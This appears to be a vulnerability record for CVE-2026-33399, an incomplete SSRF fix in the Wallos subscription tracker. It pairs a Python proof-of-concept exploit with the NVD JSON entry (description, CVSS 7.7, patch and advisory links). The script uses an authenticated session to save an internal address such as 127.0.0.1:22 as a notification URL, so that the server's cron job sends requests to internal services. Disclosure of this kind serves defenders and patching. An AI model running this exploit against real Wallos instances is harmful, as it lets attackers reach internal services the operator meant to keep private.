CVE-2026-33399

import requests # Configuration # Replace with the actual target URL and a valid session cookie target_host = "http://vulnerable-wallos-instance.com" internal_ip = "http://127.0.0.1:22" # Target internal service (e.g., SSH, Admin Panel) session_cookie = "valid_user_session_id_here" # The vulnerable save endpoint (inferred from 'save*' endpoints description) save_url = f"{target_host}/save-notification-url" # Payload containing the internal IP address payload_data = { "url": internal_ip, "method": "POST", "event_type": "subscription_renewal" } # Headers with authentication headers = { "Cookie": f"PHPSESSID={session_cookie}", "Content-Type": "application/x-www-form-urlencoded" } try: # Step 1: Send request to save the malicious internal URL # The 'save*' endpoint lacks the validate_webhook_url_for_ssrf() check response = requests.post(save_url, data=payload_data, headers=headers) if response.status_code == 200: print("[+] Success: Internal IP URL saved successfully.") print("[+] The server's cron job 'sendnotifications.php' will now send a request to the internal IP.") print(f"[+] Target: {internal_ip}") else: print(f"[-] Failed to save URL. Status Code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33399", "sourceIdentifier": "[email protected]", "published": "2026-03-24T18:16:11.153", "lastModified": "2026-03-26T20:40:28.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, the SSRF fix applied in version 4.6.2 for CVE-2026-30839 and CVE-2026-30840 is incomplete. The validate_webhook_url_for_ssrf() protection was added to the test* notification endpoints but not to the corresponding save* endpoints. An authenticated user can save an internal/private IP address as a notification URL, and when the cron job sendnotifications.php executes, the request is sent to the internal IP without any SSRF validation. This issue has been patched in version 4.7.0."}, {"lang": "es", "value": "Wallos es un rastreador de suscripciones personal de código abierto y autoalojable. Antes de la versión 4.7.0, la corrección de SSRF aplicada en la versión 4.6.2 para CVE-2026-30839 y CVE-2026-30840 está incompleta. La protección validate_webhook_url_for_ssrf() se añadió a los puntos finales de notificación test* pero no a los puntos finales de guardado save* correspondientes. Un usuario autenticado puede guardar una dirección IP interna/privada como URL de notificación, y cuando se ejecuta el trabajo cron sendnotifications.php, la solicitud se envía a la dirección IP interna sin ninguna validación de SSRF. Este problema ha sido parcheado en la versión 4.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.7.0", "matchCriteriaId": "7376DD5F-C93E-4454-810B-DE04B2DE7032"}]}]}], "references": [{"url": "https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef#diff-d77202c5d47a3d7d4586e519f6f5e256da5fb2969fa8b9c75c399b2821e9de40", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-mfjc-3258-cq3j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}